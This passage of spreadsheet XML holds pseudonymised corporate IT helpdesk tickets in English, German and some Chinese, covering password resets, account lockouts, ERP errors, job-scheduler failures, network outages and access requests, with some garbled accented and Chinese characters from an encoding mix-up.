_x000D_
received from: tzradpnj.izlotycb@gmail.com_x000D_
_x000D_
hello it team,_x000D_
_x000D_
what am i supposed to do with that issue?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>passwort entsperrung erp SID_34</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: plfwoagd.chtpiazu@gmail.com_x000D_
_x000D_
trotz benutzung des password_management_tool passwortmanagers funktioniert die entsperrung nicht._x000D_
ich konnte mich nicht in erp SID_34 einloggen._x000D_
password_management_tool entsperrung verwendet, kein erfolg_x000D_
anruf bei it â€“ rÃ¼cksetzung pw auf daypay3 â€“ zugang zu SID_34 dann mÃ¶glich_x000D_
musste aber Ã¼ber password_management_tool wieder alle pw angleichen auf das neue pw_x000D_
nach telefonat erneutes einloggen im erp versucht. geht wieder nicht._x000D_
_x000D_
tut mir leid leute. ich kann nicht den ganzen tag damit verbringen, mir neue passwÃ¶rter zu Ã¼berlegen._x000D_
bringt password_management_tool mit erp pw endlich zum laufen, damit diese firma effizienter wird._x000D_
_x000D_
fÃ¼r den aktuellen fall bitte ich um erneute rÃ¼cksetzung es SID_34 passworts auf daypay3 damit ich weiterarbeiten kann._x000D_
_x000D_
_x000D_
_x000D_
[cid:image001.png@01d1ff80.ac619c70]_x000D_
_x000D_
mit freundlichen grugermany / best </t>
  </si>
  <si>
    <t>vvdortddp</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: aksthyuhath.shettythruy@company.com
hi,
please reset the password of mr. pradtheyp and share the new password to his manager mr. navbrtheen gogtr &lt;utoegyqx.lhosidqg@gmail.com&gt;.
emp no
name
useid
manager
20284583
yaxmwdth xsfgitmq
vvdortddp
navbrtheen gogtr
with </t>
  </si>
  <si>
    <t>no acces to the network with pc ewewx200257 in departement qa</t>
  </si>
  <si>
    <t>no acces to the network with pc 200257 in departement qa. tha access is urgent necessary for hardness measuring software. yevirgnl ylhogjct and ughzilfm cfibdamq are the responsible person</t>
  </si>
  <si>
    <t>\\HostName_29\kt-transition\applications\portal-pi-java-web\pi_training : full access : guprgttas1</t>
  </si>
  <si>
    <t>manually constructed have 3 new numbers in the mm01 (mm 7302314/6291204/7302316). if i want to extend the material maste</t>
  </si>
  <si>
    <t>manually constructed have 3 new numbers in the mm01 (mm 7302314/6291204/7302316). if i want to extend the rqfhiong zkwfqagb, the system does not find any iso / ansi code. when i use the code manually night rage comes the message "ansi catalog and grades already used by material"_x000D_
_x000D_
please check attachment.</t>
  </si>
  <si>
    <t xml:space="preserve">aufstellung ordnerzugriff </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wtxvqngf.nxjivlmr@gmail.com
sehr geehrte damen und herren,
ich bin share-owner des laufwerks departments\betriebsrat im werk germany
und benÃ¶tige eine Ã¼bersicht, wer alles zugriff auf den oben stehenden ordner hat.
bitte lassen sie mir diese aufstellung unmittelbar zukommen.
mit freundlichen grÃ¼ÃŸen,
wtxvqngf nxjivlmr
betriebsratsvorsitzender
company produktions gmbh &amp; co. kg
altweiherstraÃŸe 27-31
company produktions gmbh &amp; co. kg
geschÃ¤ftsfÃ¼hrer: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</si>
  <si>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wtxvqngf nxjivlmr</t>
  </si>
  <si>
    <t>stamping of timings in EU_tool is not working</t>
  </si>
  <si>
    <t>pulvermetalogy ee01_x000D_
staeberoth fertigung ee02_x000D_
sk hartbearbeitung ee03_x000D_
_x000D_
user cannot stamp in &amp; out time in EU_tool._x000D_
_x000D_
data is not transferred to erp from yesterday. he does not know which employee was present yesterday and who was absent.</t>
  </si>
  <si>
    <t>mstnjfai xcobykhl</t>
  </si>
  <si>
    <t xml:space="preserve">issue with erp SID_1 </t>
  </si>
  <si>
    <t>issue with erp SID_1 _x000D_
page is not loading</t>
  </si>
  <si>
    <t xml:space="preserve">outlook email access for felix zhang ; mobile device activation :; personal device. </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kbclinop.vsczklfp@gmail.com_x000D_
_x000D_
hi,_x000D_
please usa outlook access (email and calendar) for below staff on his iphone._x000D_
_x000D_
avmeocnk.mvycfwka@gmail.com&lt;mailto:avmeocnk.mvycfwka@gmail.com&gt;_x000D_
dept:  r&amp;d_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">error on ddeihrsh sigrtyhdeo's laptop </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kbclinop.vsczklfp@gmail.com_x000D_
_x000D_
hi,_x000D_
dibesh's laptop cannot boot up, need to resolve the issue._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wktesmbp.lorjymef@gmail.com
dear teamï¼Œ
we once shipped a subcontract order on jul 21th,
po#5616690206
rough material#2224208*10pcs
movement type:541
but its corresponding end product mm#6004236 still exists in erp,pls. help to check the root cause,thx!
[cid:image002.png@01d1ff9f.c823SID_310]
[cid:image001.png@01d1ffa0.05272471]
b.rgds
judthtihty.zhuyhts
company hardpoint apac-wgq dc
</t>
  </si>
  <si>
    <t>tablet - dell 7350 - ç”µè„‘å¼€æœºå¯åŠ¨è“å±</t>
  </si>
  <si>
    <t>please provide details of the issue._x000D_
ç”µè„‘å¼€æœºå¯åŠ¨è“å±</t>
  </si>
  <si>
    <t>rbkvofgu jthclzow</t>
  </si>
  <si>
    <t>can not post dn# 9169142692 due to batch issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wktesmbp.lorjymef@gmail.com
dear team,
pls. help to check return delivery#9169142692ï½ž
it's required to enter batch but we can not key in anything in the blank
[cid:image001.png@01d1ffa6.a718f620]
[cid:image002.png@01d1ffa7.0ff104d0]
b.rgds
judthtihty.zhuyhts
company hardpoint apac-wgq dc
</t>
  </si>
  <si>
    <t xml:space="preserve">laptop doesn't access with network </t>
  </si>
  <si>
    <t>zjwecphr swhkzyfq</t>
  </si>
  <si>
    <t xml:space="preserve">vpn login issue : account lock out </t>
  </si>
  <si>
    <t>vpn login issue : account lock out</t>
  </si>
  <si>
    <t xml:space="preserve">mobile device activation : company provided </t>
  </si>
  <si>
    <t>sql error 2048 in SID_1 erp system</t>
  </si>
  <si>
    <t xml:space="preserve">there are are more than 15+ dumps in st22 with sql error 2048 </t>
  </si>
  <si>
    <t>vradzimk xvmcoskl</t>
  </si>
  <si>
    <t>cartridge id02</t>
  </si>
  <si>
    <t xml:space="preserve">printer cartridge replacement on the printer </t>
  </si>
  <si>
    <t xml:space="preserve">ie not launching </t>
  </si>
  <si>
    <t xml:space="preserve">ie not launching _x000D_
_x000D_
tried opening in safe mode, no go_x000D_
reset , no go_x000D_
tried disabling ie windows features, failed to disable._x000D_
reboot system._x000D_
it worked fine._x000D_
 </t>
  </si>
  <si>
    <t>ad account lock out and password reset through password_management_tool password manager.</t>
  </si>
  <si>
    <t>delete of history/ cache in seocompanyxv syxewkji &lt;seocompanyxv.syxewkji@gmail.com&gt; for ess uacyltoe hxgayczeing</t>
  </si>
  <si>
    <t xml:space="preserve">delete of history/ cache in seocompanyxv syxewkji &lt;seocompanyxv.syxewkji@gmail.com&gt; for ess uacyltoe hxgayczeing_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>defekt kopierer k 13</t>
  </si>
  <si>
    <t>kopierer ausbildungswerkstatt k 13 defekt. fehlermeldung: einzug fehlerhaft servicedienst notwendig</t>
  </si>
  <si>
    <t xml:space="preserve">ad account locked out 
:520056771751
summary:i am locked out of my computer.
</t>
  </si>
  <si>
    <t>isbczxtu gvxureqa</t>
  </si>
  <si>
    <t>skype issue : unable to make or receive calls in skype</t>
  </si>
  <si>
    <t>unable to make or receive calls in skype. most of the times the warehouse_tool thru hehr_toolhones is not audible but can be heard thru speake</t>
  </si>
  <si>
    <t>r101 drucker defekt</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/26/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/26/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">in the inbox always show there are several emails which has not been read , but i had already </t>
  </si>
  <si>
    <t xml:space="preserve">+86  </t>
  </si>
  <si>
    <t>job failed : ( there is no datasource with these attributes ) please check attachment</t>
  </si>
  <si>
    <t>job failed : ( there is no datasource with these attributes )  please check attachment</t>
  </si>
  <si>
    <t xml:space="preserve">account lock out issue </t>
  </si>
  <si>
    <t xml:space="preserve">general query about rdp : </t>
  </si>
  <si>
    <t>44
user wanted to report about some one working on his system without his awareness.
checked with changes happened in computer, it was erp went back to default settings.
checked in programdntys and features , it was erp patch installed during that time.
appreciated user and asked to inform if he sees this activity again.</t>
  </si>
  <si>
    <t>rxyopuha svfqmncl</t>
  </si>
  <si>
    <t>could not setup notification list in dvw system: warning ora-02291.</t>
  </si>
  <si>
    <t xml:space="preserve">user name: yinnrty
user id: 11333657100
system: dvw
contact phone: 
error message:ora-02291: integrity constraint (gdwowner.fk_sbscrptn_tblusers) violated - parent key not found 
----------------------------------------
production specifications:Â 
application serverÂ :lhqSID_1854
database serverÂ / name:oracle gdwp
</t>
  </si>
  <si>
    <t>cysbkonu mzutvwir</t>
  </si>
  <si>
    <t xml:space="preserve">account lock out issue _x000D_
remote into user computer and removed all old password._x000D_
cleared temp and prefetch file._x000D_
signed in to outlook and checked with skype._x000D_
ran lock out status and informed user to update password in all mobile device._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ihlguasz agnwcqiz</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/25/2016 22:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/25/2016 22:02:00</t>
  </si>
  <si>
    <t>ksem / m36 / ewkw8113117 / rechner startet nicht</t>
  </si>
  <si>
    <t>bios einstellen, das rechner bei netz-reset selbststÃ¤ndig startet._x000D_
bitte um erledigung durch m. himghtmelreich</t>
  </si>
  <si>
    <t>zxopwyak zrbfkimx</t>
  </si>
  <si>
    <t>unable to print from erp</t>
  </si>
  <si>
    <t>circuit outage: india telecom_vendor_1 40 &amp; 20 mbps circuits are down at 4:33 pm et on 08/25. site is up on telecom_vendor_3 circuit .</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____yes____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______4:33 pm et on 08/25________________x000D_
_x000D_
3.  scheduled maintenance ( power) ?    no    yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
4.  scheduled maintenance ( network) ? __no_____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ___yes___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___yes_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _____na____     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   _______na____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _______na____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</si>
  <si>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pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/25/2016 16:14:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/25/2016 16:14:00</t>
  </si>
  <si>
    <t>network outage : usa warehouse, vpn circuit is down at 3:16 pm et on 08/25. site is up on primary.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______3:16 pm et on 08/25._______________x000D_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_____na______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</si>
  <si>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unable to connect to the printers dv07 and dv28. also need help to connect scanner</t>
  </si>
  <si>
    <t>unable to connect to the printers dv07 and dv28. i also need help with the scanner, i tried to download the driver from the fujitsu website but when i tried to run it i need to have administrator access???</t>
  </si>
  <si>
    <t>eocvkuxw eqfsphnd</t>
  </si>
  <si>
    <t>latpop will not startup without ac power cord connected so suspect a bad battery?</t>
  </si>
  <si>
    <t>circuit outage: usa , vpn circuit is down at 2:42 pm et on 08/25. circuit is up on primary.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __slo site_______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __________2:42 pm et on 08/25____________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ____na___    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ___na____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______na_____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</si>
  <si>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jfgepoay qsbjaemc</t>
  </si>
  <si>
    <t>ebxrlknc txnvwupy</t>
  </si>
  <si>
    <t>intermittent internet connection</t>
  </si>
  <si>
    <t>delivery notes from other users coming to the printer</t>
  </si>
  <si>
    <t xml:space="preserve">system slow on start up </t>
  </si>
  <si>
    <t>yhzdtkla ncobgtdm</t>
  </si>
  <si>
    <t>check router wifi - site: south_amerirtca - sp - sÃ£o bernardo campo (mercedes benz)</t>
  </si>
  <si>
    <t xml:space="preserve">hi team, please check the router wifi the site company -south_amerirtca - sÃ£o pollaurido / sÃ£o bernardo campo. no is possible connect network wifi - companysecure, this network no is visible to users local. if you need connect remotely or has more doubts please, return me.. </t>
  </si>
  <si>
    <t>usa print</t>
  </si>
  <si>
    <t>usa print issue</t>
  </si>
  <si>
    <t>sign-on is not working</t>
  </si>
  <si>
    <t>name:mikhghytr karaffa
language:
browser:microsoft internet explorer
email:vfrdxtqw.jfbmsenz@gmail.com
customer number:
telephone:
summary:hello, my single sign-on is not working</t>
  </si>
  <si>
    <t>pc probleme urgent</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: eluvxqhw.gpbfkqeu@gmail.com
hallo ,
folgende funktionen und programdntyme laufen nicht mehr.
Â·       weekly report lÃ¤ÃŸt sich nicht Ã¼bertragen, meldet falscher serverpfad.
Â·       collaboration_platform findet die biblotheken nicht mehr.
Â·       keine synchronisation mit collaboration_platform mehr.
Â·       lte verbindung nicht mÃ¶glich.
mit freundlichen grÃ¼ÃŸen
eluvxqhw gpbfkqeu
anwendungstechnik/ application engineer
transportation central europe
e-mail: eluvxqhw.gpbfkqeu@gmail.com&lt;mailto:eluvxqhw.gpbfkqeu@gmail.com&gt;
company deutschland gmbh www.company.com&lt;
geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, phvkowml azbtkqwx ,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</si>
  <si>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eluvxqhw gpbfkqeu</t>
  </si>
  <si>
    <t>unable to load engineering tool</t>
  </si>
  <si>
    <t>half the icons on my desktop are gone after a reboot and updates were applied</t>
  </si>
  <si>
    <t>unable to get on skype audio meeting with outside vendors</t>
  </si>
  <si>
    <t xml:space="preserve">usa oh operators are locked out of mii and not able to scan in production and capture value add </t>
  </si>
  <si>
    <t xml:space="preserve">usa oh operators are locked out of mii and not able to scan in production 
1) tortm hortl (howthrelte) - happened twice in one week
2) dmitazhw kxbifzoh 
</t>
  </si>
  <si>
    <t>fjtrnslb ejzkrchq // account has expired</t>
  </si>
  <si>
    <t xml:space="preserve">users in chicago wants to update bank details </t>
  </si>
  <si>
    <t>bios update</t>
  </si>
  <si>
    <t>i am stuck.     has 3 lines.   lines 40 and 50 have been inwarehouse_toold 0158401519.   line 60 we cannot pgi</t>
  </si>
  <si>
    <t xml:space="preserve">i am stuck.    9168335496 has 3 lines.   lines 40 and 50 have been inwarehouse_toold 0158401519.   line 60 we cannot pgi, so it has not inwarehouse_toold.  any ideas on how we can get line 60 inwarehouse_toold?_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
v  _x000D_
</t>
  </si>
  <si>
    <t>avkotjzx hmntobws</t>
  </si>
  <si>
    <t>device type changes for usa</t>
  </si>
  <si>
    <t>ticket update on inplant_853729</t>
  </si>
  <si>
    <t>ticket update on inplant_853833</t>
  </si>
  <si>
    <t>device not running dell ml6000 tape library!</t>
  </si>
  <si>
    <t xml:space="preserve">device not running dell ml6000 tape library !_x000D_
_x000D_
backup device not running. error say "open door" !!!!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>license inquiry about k1 license</t>
  </si>
  <si>
    <t>zkhmvnib sugzyvhp</t>
  </si>
  <si>
    <t>adobe reader on my pc suddenly will not work, immediate crash "adobe has stopped working"</t>
  </si>
  <si>
    <t>pzrskcon pobsajnx</t>
  </si>
  <si>
    <t>need access to znqcljxt azvoespk's emails</t>
  </si>
  <si>
    <t>outlook is not responding. error : need password.</t>
  </si>
  <si>
    <t>connections problems with microsoft collaboration_platform and my company account</t>
  </si>
  <si>
    <t>name:erirtc
language:
browser:microsoft internet explorer
email:ntsowaem.jfgslyde@gmail.com
customer number:
telephone:7
summary:following up on ctc t-code application  incident - ticket_no1539328.  can we please get the folks access aerp?</t>
  </si>
  <si>
    <t>wireless guest access</t>
  </si>
  <si>
    <t>cti ( network â€“wireless-guest )
guest first name: jeffrghryey
guest last name: adrhtykins
guest email-id : jadrhtykins@salesforce.com
contact no - 412
location: 
company sponsor email-id: vbmzgsdk.jdmyazti@gmail.com
duration (duration for guest access) : today until 3 pm est</t>
  </si>
  <si>
    <t>intermittent shutdown on this computer</t>
  </si>
  <si>
    <t>inwarehouse_tools 0581144512 and 0581149834 issued for ic5268. should be ic5252.</t>
  </si>
  <si>
    <t xml:space="preserve">inwarehouse_tools 0581144512 and 0581149834 issued for ic5268. should be ic5252._x000D_
</t>
  </si>
  <si>
    <t>cannot make or recieve calls on iphone 5.</t>
  </si>
  <si>
    <t>okubexia viungdpw</t>
  </si>
  <si>
    <t>user needs this account as mentioned in the screenshot to be an active account so that he can add a new opportstorage_product.</t>
  </si>
  <si>
    <t>got a call transferred from vitalyst // user needs this account as mentioned in the screenshot to be an active account so that he can add a new opportstorage_product.</t>
  </si>
  <si>
    <t>new laptop set-up</t>
  </si>
  <si>
    <t>set up and new laptop and remove the old one</t>
  </si>
  <si>
    <t>project collaboration_platform site is no longer creating a project id when a new project is added.</t>
  </si>
  <si>
    <t xml:space="preserve">project collaboration_platform site is no longer creating a project id when a new project is added._x000D_
_x000D_
_x000D_
examples:_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>blank call with noise</t>
  </si>
  <si>
    <t>i have created 2 new material numbers but when i try to build the bom or put it in a bom it says material does not exist</t>
  </si>
  <si>
    <t>mm#'s 7390081 and 6290061</t>
  </si>
  <si>
    <t>cannot access email</t>
  </si>
  <si>
    <t>same incident as the past two days, cannot access to email or km collaboration_platform, it fixed the issue but it is occurring again</t>
  </si>
  <si>
    <t>rqnxlkce nvrzduyk</t>
  </si>
  <si>
    <t>please display monthly information on the sales approve screen in the compensation programdnty</t>
  </si>
  <si>
    <t>please display monthly information on the sales approve screen in the compensation programdnty. since the performance % calculation was changed to a monthly calculation, the screen has become a little confusing.</t>
  </si>
  <si>
    <t xml:space="preserve">from: aghynil dirttwan [mailto:toolperfect@gmail.com] 
sent: thursday, august 25, 2016 11:08 am
to: nwfodmhc exurcwkm
subject: sabrthy engineering tool.
respected sir/madam,
please guidge me how to install engineering tool.we have tried on web,but its not done download.
please reply.
-- 
mr. aghynil dirttwan
perfect sales &amp; services
g-28, mohgrtyan arcade,
</t>
  </si>
  <si>
    <t>created rqfhiong zkwfqagb 7301102 yesterday afternoon.  it does not exist in erp but the ansi iso says it already exists</t>
  </si>
  <si>
    <t xml:space="preserve">when i try to re-create with ansi iso tbbuyhexstandoff18mm erp says it already exists._x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>ivkhegjw gquflzse</t>
  </si>
  <si>
    <t>query : who is the owner of  shared mailbox : k-mws-distributor-discounts</t>
  </si>
  <si>
    <t>rmegscqu juksmtho</t>
  </si>
  <si>
    <t>hwbjnpmg nzrbmojg</t>
  </si>
  <si>
    <t>bitte ewew8323718 konto wieder aktivieren</t>
  </si>
  <si>
    <t>xmlbfjpg yegzbvru</t>
  </si>
  <si>
    <t>engineering tool password reset.</t>
  </si>
  <si>
    <t>dxfbqwyg cyzfmrpq</t>
  </si>
  <si>
    <t>unable to change the password from password_management_tool</t>
  </si>
  <si>
    <t>fniphjkr tlxygdeh</t>
  </si>
  <si>
    <t>unable to log in to email, erp and collaboration_platform</t>
  </si>
  <si>
    <t>afbcmwsu tjgciswl</t>
  </si>
  <si>
    <t>telefon asxpnlgk mnktdsjq (durchwahl 174) defekt.</t>
  </si>
  <si>
    <t>display kaum noch lesbar. verbindung bei telefonaten wird mittendrin unterbrochen.</t>
  </si>
  <si>
    <t>outlook access</t>
  </si>
  <si>
    <t xml:space="preserve">outlook will not connect when working from home office. </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 08/25/2016 08:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 08/25/2016 08:15:00</t>
  </si>
  <si>
    <t>unable to submit a discount form from collaboration_platform</t>
  </si>
  <si>
    <t>wrong calculation in erp</t>
  </si>
  <si>
    <t>the rebate was not calculated correctly in the inwarehouse_tools 0158493708 + 0158484133._x000D_
it was too little rebate.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2668 failed in job_scheduler at: 08/25/2016 08:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2668 failed in job_scheduler at: 08/25/2016 08:06:00</t>
  </si>
  <si>
    <t>please reset my password for hr_tool globalview SID_67</t>
  </si>
  <si>
    <t>need help to reset password.</t>
  </si>
  <si>
    <t>can you help me reset password for microsoft lync please</t>
  </si>
  <si>
    <t>zvwrklfa pguesbno</t>
  </si>
  <si>
    <t xml:space="preserve">the detail of earnings batch job is not sending the most current payroll info.   </t>
  </si>
  <si>
    <t xml:space="preserve">i keep getting zearn report for 6/06/16 -6/19/19._x000D_
e-mail title fw: job hr446, step 1_x000D_
how do i get the correct report.  </t>
  </si>
  <si>
    <t>cjqdksbn ysqxpovz</t>
  </si>
  <si>
    <t xml:space="preserve">printer change from fd37 to fd34 </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: repyzajo.lxfwopyq@gmail.com_x000D_
_x000D_
hello help,_x000D_
_x000D_
as instructed by ecwtrjnq jpecxuty, please change permanently all default printing jobs/outputs on the erp printer fd37 to the printer fd34._x000D_
also, please repeat all jobs sent to the printer fd37 between friday, august 19th until now on the new printer fd34._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>urgent - registration of infopath 2013</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: kuznvase.jrxtbuqz@gmail.com_x000D_
_x000D_
dear all,_x000D_
_x000D_
please urgently advise how to proceed with this._x000D_
i am asked to review price discounts obviously managed by this ms tool:_x000D_
_x000D_
[cid:image001.png@01d1fed1.faf73520]_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>kuznvase jrxtbuqz</t>
  </si>
  <si>
    <t>unable to connect to hub</t>
  </si>
  <si>
    <t>folder access (s:\globalace_holemaking\ha646)</t>
  </si>
  <si>
    <t xml:space="preserve">please se my comments in red._x000D_
_x000D_
viele grÃ¼ÃŸe / best </t>
  </si>
  <si>
    <t>blocked web pages</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: iygsxftl.hysrbgad@gmail.com_x000D_
_x000D_
dear all,_x000D_
_x000D_
please unblock web pages which i do urgently need to access for my technical research._x000D_
_x000D_
e.g.:_x000D_
[cid:image001.png@01d1fec2.852ceec0]_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>iygsxftl hysrbgad</t>
  </si>
  <si>
    <t>profile setup for new joiner</t>
  </si>
  <si>
    <t xml:space="preserve">laptop and profile setup for new joiner nikitha upadhyaya/lqnoifve wvhelqxu </t>
  </si>
  <si>
    <t>nawkpdtx gwcvmbhn</t>
  </si>
  <si>
    <t>need erp access to /n/dscsag/conv_rule</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1 &amp; SID_34
enter user id of user having the issue: gthydanp
transaction code(s) the user needs or was working with: /n/dscsag/conv_rule
describe the issue: need access to the t- code 
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.  attached
provide access the same as this other user :phillpd</t>
  </si>
  <si>
    <t>die suchfunktion des skype verzeichnisses funktioniert immer noch nicht.</t>
  </si>
  <si>
    <t>oefitbmy gcubyszd</t>
  </si>
  <si>
    <t>akku def. openstage sl4 bitte neuen besorgen - phone replacement (siemens)</t>
  </si>
  <si>
    <t>akku def. openstage sl4 bitte neuen besorgen</t>
  </si>
  <si>
    <t>pls. check user:yubtgy1 account</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wktesmbp.lorjymef@gmail.com
dear team,
pls. help to check below user's account, which account has been locked for several times~ thx a lot!
user: yubtgy1
b.rgds
judthtihty.zhuyhts
company hardpoint apac-wgq dc
</t>
  </si>
  <si>
    <t>probleme mit weekly report und engineering_tool angebotserstellung</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rkyjnbqh.kfshormi@gmail.com
hallo zusammen,
bitte um hilfe mit weekly report und engineering_tool angebotserstellung.
bin heute bis 12uhr telefonisch erreichbar.
vielen dank,
gruÃŸ
[cid:image001.png@01d1febc.4451e6e0][cid:image003.jpg@01d1febc.9d05ba00]
rkyjnbqh kfshormi
b. eng.
anwendungstechnik i application engineer
rkyjnbqh.kfshormi@gmail.com
company deutschland gmbh
geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, phvkowml azbtkqwx, naruedlk mpvhakdq
</t>
  </si>
  <si>
    <t>rkyjnbqh kfshormi</t>
  </si>
  <si>
    <t>e&amp;o access request for partner team</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: izwtdnfq.xptuoaid@gmail.com_x000D_
_x000D_
hi pradtheyp,_x000D_
_x000D_
partner team will support myself and jintana to run e&amp;o report going forward. can you provide the access usaed to debaghjsish based on his email  eonhuwlg.sxthcobm@gmail.com&lt;mailto:eonhuwlg.sxthcobm@gmail.com&gt; ?._x000D_
_x000D_
below is the e&amp;o access path required the access usaed to him._x000D_
_x000D_
#/site/certified_content/views/eoreport-finance/timegraphfilters?:iid=1_x000D_
_x000D_
  let me know once done. appreciate if you provide the access preferably by sep 2, next friday._x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>qlhmawgi sgwipoxn mp_fb locked.</t>
  </si>
  <si>
    <t>dmvznstx jnpgzoxy</t>
  </si>
  <si>
    <t>skype anmeldung</t>
  </si>
  <si>
    <t>ich habe gestern Ã¼ber den passwortmanager mein passwort geÃ¤ndert. seitdem funktioniert die skype anmeldung nicht mehr. weder mit dem neuen, noch mit dem alten passwort. fehlermeldung: der benutzername, das kennwort oder die domÃ¤ne scheint falsch zu sein.</t>
  </si>
  <si>
    <t>access for igurwxhv ughynofq to mailbox</t>
  </si>
  <si>
    <t xml:space="preserve">hi helpdesk, please give access to igurwxhv ughynofq from partner(outsouring company) to k-sg.inwarehouse_tools@company.com_x000D_
</t>
  </si>
  <si>
    <t>wzbahpxu phvyuwxb</t>
  </si>
  <si>
    <t xml:space="preserve"> plm cache server logging issue</t>
  </si>
  <si>
    <t>as per attached email, we see an issue with cache server logging and also caching server working as well._x000D_
please also look at the erp reply who raised questions on cache server accessibility.</t>
  </si>
  <si>
    <t>conduct goods movement with erp transaction mb11 from plant_205 to plant_245</t>
  </si>
  <si>
    <t xml:space="preserve">from: iwazgesl ydgqtpbo [mailto:iwazgesl.ydgqtpbo@gmail.com] _x000D_
sent: thursday, august 25, 2016 12:08 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
cc: nkiopevt gufwhdky_eh_x000D_
subject: tru : goods movement mb11 from plant_205 to plant_245_x000D_
_x000D_
hello,_x000D_
_x000D_
_x000D_
could you please advise us how to conduct goods movement with erp transaction mb11 from plant_205 to plant_245? we are not able to do this._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>epbqhudt fumxovjz</t>
  </si>
  <si>
    <t>user cwfzldts dlmukhyn cannot create purchasing requistions out of punch out catalogues</t>
  </si>
  <si>
    <t xml:space="preserve">now he get the right document type, but he has several other problems.:_x000D_
the wrong material group is shown (mendmre) istead of _x000D_
default should be c-select_x000D_
in accounting there should be "costcenter" as default, for him is order, and the gl account does not come up automatically. _x000D_
i've got the information that all requisitioners of this plant had the problems. i will get a mail for a colleague with the person who has solved this issue. i will add it as soon as i have the mail._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cwfzldts dlmukhyn</t>
  </si>
  <si>
    <t>latitude e7350 does not properly boot up - i get a blue empty screen with no log on mask</t>
  </si>
  <si>
    <t>fesmalcu qjlwvrnk</t>
  </si>
  <si>
    <t>latitude 7275 does not boot up properly - got a blue empty screen - eagl8000055</t>
  </si>
  <si>
    <t>support fÃ¼r umbau \ we22 \ port 22 \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>umbau rechner ewew8323542 \ port 21 \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>setup new ws \instandsetzung\ nfayqjhg kyswcpei</t>
  </si>
  <si>
    <t>ms office /outlook issue</t>
  </si>
  <si>
    <t>iowkrcpd snrvlhyc</t>
  </si>
  <si>
    <t>cannot use copy to option in engineering tool : getting error message.</t>
  </si>
  <si>
    <t>cannot use copy to option in engineering tool : getting error message._x000D_
it never worked for user._x000D_
anticipating access issue.</t>
  </si>
  <si>
    <t>support fÃ¼r umzug \qwynjdbk eamnvwyh</t>
  </si>
  <si>
